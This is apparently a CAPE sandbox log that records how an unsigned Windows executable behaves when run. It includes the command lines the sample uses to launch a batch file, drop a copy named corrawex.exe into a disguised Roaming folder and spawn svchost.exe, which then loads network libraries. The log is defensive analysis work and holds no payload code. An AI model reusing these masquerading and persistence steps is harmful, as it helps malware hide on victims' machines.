Analysis

Category Package Started Completed Duration Options Log
FILE exe 2020-03-24 09:43:03 2020-03-24 09:46:45 222 seconds Show Options Show Log
route = internet
procdump = 1
2020-03-24 09:43:03,000 [root] INFO: Date set to: 03-24-20, time set to: 09:43:03, timeout set to: 200
2020-03-24 09:43:03,015 [root] DEBUG: Starting analyzer from: C:\sdijqg
2020-03-24 09:43:03,015 [root] DEBUG: Storing results at: C:\RMoLMdOT
2020-03-24 09:43:03,015 [root] DEBUG: Pipe server name: \\.\PIPE\zaxaupWeDT
2020-03-24 09:43:03,015 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-03-24 09:43:03,015 [root] INFO: Automatically selected analysis package "exe"
2020-03-24 09:43:03,342 [root] DEBUG: Started auxiliary module Browser
2020-03-24 09:43:03,342 [root] DEBUG: Started auxiliary module Curtain
2020-03-24 09:43:03,342 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-03-24 09:43:03,561 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-03-24 09:43:03,561 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module DigiSig
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module Disguise
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module Human
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module Screenshots
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module Sysmon
2020-03-24 09:43:03,561 [root] DEBUG: Started auxiliary module Usage
2020-03-24 09:43:03,561 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-03-24 09:43:03,561 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-03-24 09:43:03,576 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe" with arguments "" with pid 920
2020-03-24 09:43:03,576 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:43:03,576 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:43:03,608 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:43:03,608 [root] DEBUG: Loader: Injecting process 920 (thread 1876) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:43:03,608 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:43:03,608 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:43:03,608 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:43:03,608 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:43:03,608 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 920
2020-03-24 09:43:05,619 [lib.api.process] INFO: Successfully resumed process with pid 920
2020-03-24 09:43:05,619 [root] INFO: Added new process to list with pid: 920
2020-03-24 09:43:05,730 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:43:05,730 [root] DEBUG: Process dumps enabled.
2020-03-24 09:43:05,760 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:43:05,760 [root] INFO: Disabling sleep skipping.
2020-03-24 09:43:05,760 [root] INFO: Disabling sleep skipping.
2020-03-24 09:43:05,760 [root] INFO: Disabling sleep skipping.
2020-03-24 09:43:05,760 [root] INFO: Disabling sleep skipping.
2020-03-24 09:43:05,760 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 920 at 0x74940000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:43:05,760 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe".
2020-03-24 09:43:05,760 [root] INFO: Monitor successfully loaded in process with pid 920.
2020-03-24 09:43:05,792 [root] DEBUG: DLL loaded at 0x74500000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:43:06,056 [root] DEBUG: set_caller_info: Adding region at 0x03A70000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:43:06,056 [root] DEBUG: set_caller_info: Adding region at 0x00230000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:43:06,072 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:43:06,072 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:43:06,088 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:43:06,088 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:43:06,088 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:44:52,371 [root] DEBUG: DLL loaded at 0x75470000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:44:52,417 [root] DEBUG: DLL loaded at 0x74400000: C:\Windows\system32\PROPSYS (0xf5000 bytes).
2020-03-24 09:44:52,417 [root] DEBUG: DLL loaded at 0x74260000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32 (0x19e000 bytes).
2020-03-24 09:44:52,417 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-03-24 09:44:52,434 [root] DEBUG: DLL loaded at 0x74870000: C:\Windows\system32\ntmarta (0x21000 bytes).
2020-03-24 09:44:52,448 [root] DEBUG: DLL loaded at 0x74A90000: C:\Windows\system32\profapi (0xb000 bytes).
2020-03-24 09:44:52,448 [root] DEBUG: DLL unloaded from 0x75E70000.
2020-03-24 09:44:52,448 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:44:52,512 [root] DEBUG: DLL loaded at 0x74A30000: C:\Windows\System32\shdocvw (0x2e000 bytes).
2020-03-24 09:44:52,526 [root] DEBUG: DLL loaded at 0x74F40000: C:\Windows\SysWOW64\urlmon (0x136000 bytes).
2020-03-24 09:44:52,542 [root] DEBUG: DLL loaded at 0x75600000: C:\Windows\syswow64\WININET (0xf5000 bytes).
2020-03-24 09:44:52,558 [root] DEBUG: DLL loaded at 0x76CA0000: C:\Windows\syswow64\iertutil (0x1fb000 bytes).
2020-03-24 09:44:52,635 [root] INFO: Announced 32-bit process name: cmd.exe pid: 332
2020-03-24 09:44:52,635 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:52,635 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:52,651 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:52,651 [root] DEBUG: Loader: Injecting process 332 (thread 1964) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [root] DEBUG: Process image base: 0x4ABC0000
2020-03-24 09:44:52,651 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:44:52,651 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 332
2020-03-24 09:44:52,651 [root] INFO: Announced 32-bit process name: cmd.exe pid: 332
2020-03-24 09:44:52,651 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:52,651 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:52,651 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:52,651 [root] DEBUG: Loader: Injecting process 332 (thread 1964) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [root] DEBUG: Process image base: 0x4ABC0000
2020-03-24 09:44:52,651 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:44:52,651 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,651 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 332
2020-03-24 09:44:52,651 [root] DEBUG: DLL unloaded from 0x74F40000.
2020-03-24 09:44:52,667 [root] DEBUG: DLL unloaded from 0x75E70000.
2020-03-24 09:44:52,667 [root] DEBUG: DLL unloaded from 0x74A30000.
2020-03-24 09:44:52,667 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:44:52,667 [root] DEBUG: Process dumps enabled.
2020-03-24 09:44:52,667 [root] DEBUG: DLL unloaded from 0x74400000.
2020-03-24 09:44:52,667 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 920
2020-03-24 09:44:52,667 [root] INFO: Disabling sleep skipping.
2020-03-24 09:44:52,667 [root] DEBUG: GetHookCallerBase: thread 1876 (handle 0x0), return address 0x0040112D, allocation base 0x00400000.
2020-03-24 09:44:52,667 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2020-03-24 09:44:52,667 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:44:52,667 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:44:52,667 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:44:52,667 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:44:52,667 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 332 at 0x74940000, image base 0x4abc0000, stack from 0x233000-0x330000
2020-03-24 09:44:52,667 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd \c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"".
2020-03-24 09:44:52,667 [root] INFO: Added new process to list with pid: 332
2020-03-24 09:44:52,667 [root] INFO: Monitor successfully loaded in process with pid 332.
2020-03-24 09:44:52,667 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\920_57155088812251824232020
2020-03-24 09:44:52,667 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:44:52,683 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2576
2020-03-24 09:44:52,683 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:52,683 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:52,683 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:52,683 [root] DEBUG: Loader: Injecting process 2576 (thread 2572) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,683 [root] DEBUG: Process image base: 0x4ABC0000
2020-03-24 09:44:52,683 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,683 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:44:52,683 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,698 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2576
2020-03-24 09:44:52,698 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:44:52,698 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:44:52,698 [root] DEBUG: DLL unloaded from 0x74870000.
2020-03-24 09:44:52,698 [root] INFO: Notified of termination of process with pid 920.
2020-03-24 09:44:52,713 [root] INFO: Announced 32-bit process name: cmd.exe pid: 2576
2020-03-24 09:44:52,713 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:52,713 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:52,730 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:52,730 [root] DEBUG: Loader: Injecting process 2576 (thread 2572) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,746 [root] DEBUG: Process image base: 0x4ABC0000
2020-03-24 09:44:52,760 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,776 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:44:52,776 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,776 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2576
2020-03-24 09:44:52,792 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:44:52,792 [root] DEBUG: Process dumps enabled.
2020-03-24 09:44:52,808 [root] INFO: Disabling sleep skipping.
2020-03-24 09:44:52,823 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:44:52,838 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 2576 at 0x74940000, image base 0x4abc0000, stack from 0xb3000-0x1b0000
2020-03-24 09:44:52,869 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\cmd  \C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"".
2020-03-24 09:44:52,901 [root] INFO: Added new process to list with pid: 2576
2020-03-24 09:44:52,901 [root] INFO: Monitor successfully loaded in process with pid 2576.
2020-03-24 09:44:52,933 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 948
2020-03-24 09:44:52,947 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:52,947 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:52,947 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:52,963 [root] DEBUG: Loader: Injecting process 948 (thread 416) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,963 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:44:52,994 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:52,994 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:44:53,026 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:53,026 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 948
2020-03-24 09:44:53,026 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:44:53,026 [root] INFO: Announced 32-bit process name: corrawex.exe pid: 948
2020-03-24 09:44:53,026 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:44:53,026 [lib.api.process] INFO: 32-bit DLL to inject is C:\sdijqg\dll\wsXKuI.dll, loader C:\sdijqg\bin\QkUngok.exe
2020-03-24 09:44:53,058 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:44:53,072 [root] DEBUG: Loader: Injecting process 948 (thread 416) with C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:53,088 [root] DEBUG: Process image base: 0x00400000
2020-03-24 09:44:53,088 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:53,088 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:44:53,119 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\wsXKuI.dll.
2020-03-24 09:44:53,119 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 948
2020-03-24 09:44:53,119 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:44:53,151 [root] DEBUG: Process dumps enabled.
2020-03-24 09:44:53,181 [root] INFO: Disabling sleep skipping.
2020-03-24 09:44:53,181 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:44:53,181 [root] DEBUG: CAPE initialised: 32-bit base package loaded in process 948 at 0x74940000, image base 0x400000, stack from 0x186000-0x190000
2020-03-24 09:44:53,213 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe"  "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE".
2020-03-24 09:44:53,213 [root] INFO: Added new process to list with pid: 948
2020-03-24 09:44:53,213 [root] INFO: Monitor successfully loaded in process with pid 948.
2020-03-24 09:44:53,213 [root] DEBUG: DLL loaded at 0x74A10000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-03-24 09:44:53,526 [root] DEBUG: set_caller_info: Adding region at 0x039E0000 to caller regions list (ntdll::LdrGetDllHandle).
2020-03-24 09:44:53,572 [root] DEBUG: set_caller_info: Adding region at 0x003F0000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:44:53,588 [root] DEBUG: DLL loaded at 0x75A70000: C:\Windows\syswow64\SETUPAPI (0x19d000 bytes).
2020-03-24 09:44:53,588 [root] DEBUG: DLL loaded at 0x75A10000: C:\Windows\syswow64\CFGMGR32 (0x27000 bytes).
2020-03-24 09:44:53,618 [root] DEBUG: DLL loaded at 0x75980000: C:\Windows\syswow64\OLEAUT32 (0x8f000 bytes).
2020-03-24 09:44:53,618 [root] DEBUG: DLL loaded at 0x75D40000: C:\Windows\syswow64\DEVOBJ (0x12000 bytes).
2020-03-24 09:44:53,618 [root] DEBUG: DLL loaded at 0x75E70000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-03-24 09:45:22,604 [root] DEBUG: DLL loaded at 0x75470000: C:\Windows\syswow64\WINTRUST (0x2d000 bytes).
2020-03-24 09:45:22,634 [root] INFO: Announced 64-bit process name: svchost.exe pid: 2092
2020-03-24 09:45:22,651 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:45:22,651 [lib.api.process] INFO: 64-bit DLL to inject is C:\sdijqg\dll\YohPbkoy.dll, loader C:\sdijqg\bin\UtRRdOuA.exe
2020-03-24 09:45:22,667 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:45:22,667 [root] DEBUG: Loader: Injecting process 2092 (thread 2068) with C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,681 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 09:45:22,697 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,729 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-03-24 09:45:22,744 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,744 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2092
2020-03-24 09:45:22,759 [root] DEBUG: DLL loaded at 0x74AF0000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-03-24 09:45:22,776 [root] INFO: Announced 64-bit process name: svchost.exe pid: 2092
2020-03-24 09:45:22,776 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:45:22,776 [lib.api.process] INFO: 64-bit DLL to inject is C:\sdijqg\dll\YohPbkoy.dll, loader C:\sdijqg\bin\UtRRdOuA.exe
2020-03-24 09:45:22,790 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:45:22,790 [root] DEBUG: Loader: Injecting process 2092 (thread 2068) with C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,806 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 09:45:22,806 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,822 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-03-24 09:45:22,822 [root] DEBUG: Successfully injected DLL C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,822 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 2092
2020-03-24 09:45:22,901 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:45:22,915 [root] DEBUG: Process dumps enabled.
2020-03-24 09:45:22,931 [root] INFO: Disabling sleep skipping.
2020-03-24 09:45:22,963 [root] WARNING: Unable to place hook on LockResource
2020-03-24 09:45:22,963 [root] INFO: Announced 64-bit process name: svchost.exe pid: 2092
2020-03-24 09:45:22,963 [root] WARNING: Unable to hook LockResource
2020-03-24 09:45:22,963 [lib.api.process] INFO: Option 'procdump' with value '1' sent to monitor
2020-03-24 09:45:22,963 [lib.api.process] INFO: 64-bit DLL to inject is C:\sdijqg\dll\YohPbkoy.dll, loader C:\sdijqg\bin\UtRRdOuA.exe
2020-03-24 09:45:22,963 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\zaxaupWeDT.
2020-03-24 09:45:22,963 [root] DEBUG: Loader: Injecting process 2092 (thread 2068) with C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:22,963 [root] DEBUG: Process image base: 0x00000000FFA10000
2020-03-24 09:45:22,963 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-03-24 09:45:22,979 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-03-24 09:45:22,979 [root] DEBUG: CAPE initialised: 64-bit base package loaded in process 2092 at 0x0000000074460000, image base 0x00000000FFA10000, stack from 0x00000000001E5000-0x00000000001F0000
2020-03-24 09:45:22,979 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-03-24 09:45:22,979 [root] DEBUG: Commandline: C:\Windows\sysnative\svchost.exe.
2020-03-24 09:45:22,993 [root] INFO: Added new process to list with pid: 2092
2020-03-24 09:45:22,993 [root] INFO: Monitor successfully loaded in process with pid 2092.
2020-03-24 09:45:23,088 [root] DEBUG: set_caller_info: Adding region at 0x0000000000120000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:23,088 [root] DEBUG: DLL loaded at 0x0000000003600000: C:\sdijqg\dll\YohPbkoy (0xd8000 bytes).
2020-03-24 09:45:23,088 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2020-03-24 09:45:23,134 [root] DEBUG: DLL unloaded from 0x0000000003600000.
2020-03-24 09:45:23,180 [root] DEBUG: Error 998 (0x3e6) - InjectDllViaThread: RtlCreateUserThread injection failed: Invalid access to memory location.
2020-03-24 09:45:23,180 [root] DEBUG: InjectDll: DLL injection via thread failed.
2020-03-24 09:45:23,180 [root] DEBUG: Failed to inject DLL C:\sdijqg\dll\YohPbkoy.dll.
2020-03-24 09:45:23,213 [lib.api.process] ERROR: Unable to inject into 64-bit process with pid 2092, error: -8
2020-03-24 09:45:23,243 [root] DEBUG: DLL loaded at 0x000007FEFEDB0000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2020-03-24 09:45:23,243 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 948
2020-03-24 09:45:23,243 [root] DEBUG: GetHookCallerBase: thread 416 (handle 0x0), return address 0x0040112D, allocation base 0x00400000.
2020-03-24 09:45:23,243 [root] DEBUG: set_caller_info: Adding region at 0x0000000000170000 to caller regions list (ntdll::NtProtectVirtualMemory).
2020-03-24 09:45:23,243 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x00400000.
2020-03-24 09:45:23,243 [root] DEBUG: set_caller_info: Adding region at 0x0000000037610000 to caller regions list (kernel32::HeapCreate).
2020-03-24 09:45:23,243 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:45:23,259 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-03-24 09:45:23,259 [root] DEBUG: DumpProcess: Module entry point VA is 0x000010E7.
2020-03-24 09:45:23,259 [root] DEBUG: set_caller_info: Adding region at 0x00000000003A0000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:45:23,259 [root] DEBUG: set_caller_info: Adding region at 0x00000000036B0000 to caller regions list (ntdll::NtClose).
2020-03-24 09:45:23,259 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\948_99719373343251824232020
2020-03-24 09:45:23,259 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x8200.
2020-03-24 09:45:23,275 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:45:23,275 [root] INFO: Notified of termination of process with pid 948.
2020-03-24 09:45:23,275 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 2576
2020-03-24 09:45:23,275 [root] DEBUG: GetHookCallerBase: thread 2572 (handle 0x0), return address 0x4ABC7302, allocation base 0x4ABC0000.
2020-03-24 09:45:23,275 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x4ABC0000.
2020-03-24 09:45:23,290 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:45:23,290 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x4ABC0000.
2020-03-24 09:45:23,290 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000829A.
2020-03-24 09:45:23,305 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\2576_165130777223251824232020
2020-03-24 09:45:23,305 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x48200.
2020-03-24 09:45:23,305 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:45:23,305 [root] INFO: Notified of termination of process with pid 2576.
2020-03-24 09:45:23,305 [root] DEBUG: set_caller_info: Adding region at 0x00000000001F0000 to caller regions list (advapi32::RegCloseKey).
2020-03-24 09:45:23,322 [root] DEBUG: DLL loaded at 0x000007FEF4950000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2020-03-24 09:45:23,322 [root] DEBUG: DLL loaded at 0x000007FEF4500000: C:\Windows\system32\webio (0x64000 bytes).
2020-03-24 09:45:23,322 [root] DEBUG: NtTerminateProcess hook: Attempting to dump process 332
2020-03-24 09:45:23,322 [root] DEBUG: GetHookCallerBase: thread 1964 (handle 0x0), return address 0x4ABC7302, allocation base 0x4ABC0000.
2020-03-24 09:45:23,322 [root] DEBUG: DumpInterestingRegions: Dumping Imagebase at 0x4ABC0000.
2020-03-24 09:45:23,322 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:45:23,336 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x4ABC0000.
2020-03-24 09:45:23,352 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000829A.
2020-03-24 09:45:23,352 [root] DEBUG: DLL loaded at 0x000007FEFEE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2020-03-24 09:45:23,352 [root] DEBUG: DLL loaded at 0x000007FEFE2F0000: C:\Windows\system32\NSI (0x8000 bytes).
2020-03-24 09:45:23,352 [root] INFO: Added new CAPE file to list with path: C:\RMoLMdOT\CAPE\332_15641567423251824232020
2020-03-24 09:45:23,352 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x48200.
2020-03-24 09:45:23,368 [root] DEBUG: DLL unloaded from 0x75140000.
2020-03-24 09:45:23,368 [root] DEBUG: DLL unloaded from 0x0000000076FF0000.
2020-03-24 09:45:23,368 [root] INFO: Notified of termination of process with pid 332.
2020-03-24 09:45:23,368 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\cryptsp (0x17000 bytes).
2020-03-24 09:45:23,384 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\system32\credssp (0xa000 bytes).
2020-03-24 09:45:23,384 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2020-03-24 09:45:23,384 [root] DEBUG: DLL loaded at 0x000007FEFC890000: C:\Windows\system32\mswsock (0x55000 bytes).
2020-03-24 09:45:23,384 [root] DEBUG: DLL loaded at 0x000007FEFC290000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2020-03-24 09:45:23,400 [root] DEBUG: DLL loaded at 0x000007FEFC880000: C:\Windows\System32\wship6 (0x7000 bytes).
2020-03-24 09:45:23,400 [root] DEBUG: DLL loaded at 0x000007FEFC710000: C:\Windows\system32\DNSAPI (0x5b000 bytes).
2020-03-24 09:45:23,414 [root] DEBUG: DLL loaded at 0x000007FEFAF10000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2020-03-24 09:45:23,414 [root] DEBUG: DLL loaded at 0x000007FEFAED0000: C:\Windows\system32\WINNSI (0xb000 bytes).
